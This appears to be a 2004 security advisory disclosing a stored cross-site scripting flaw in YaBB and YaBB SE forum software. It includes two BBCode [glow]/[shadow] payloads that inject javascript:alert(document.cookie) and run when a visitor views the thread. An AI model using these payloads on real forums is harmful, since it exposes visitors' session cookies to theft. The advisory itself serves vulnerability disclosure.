#####################################################################

Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability

Release Date : Mar 14,2004

Application : YaBB/YaBBse

Test On : YaBB 1 Gold(SP1.3)

YaBB SE 1.5.1 Final

Vendor URL : http://www.yabbforum.com/

http://www.yabbse.org/

Discover : Cheng Peng Su(apple_soup_at_msn.com)

#####################################################################

Proof of conecpt:

The problem is in [glow] and [shadow] tag,yabb doesn't filter

the charactor in this tag,attack needn't visitor to click any

links,just when the vistor read the thread,XSS code will be

executed.

Exploit:

[glow=red);background:url(javascript:alert(document.cookie));filte

r:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));fil

ter:shadow(color=red,left,300]Big Exploit[/shadow]

Contact:

Cheng Peng Su

Class 1,Senior 2,High school attached to Wuhan University

Wuhan,Hubei,China(430072)

apple_soup_at_msn.com

[ reply ]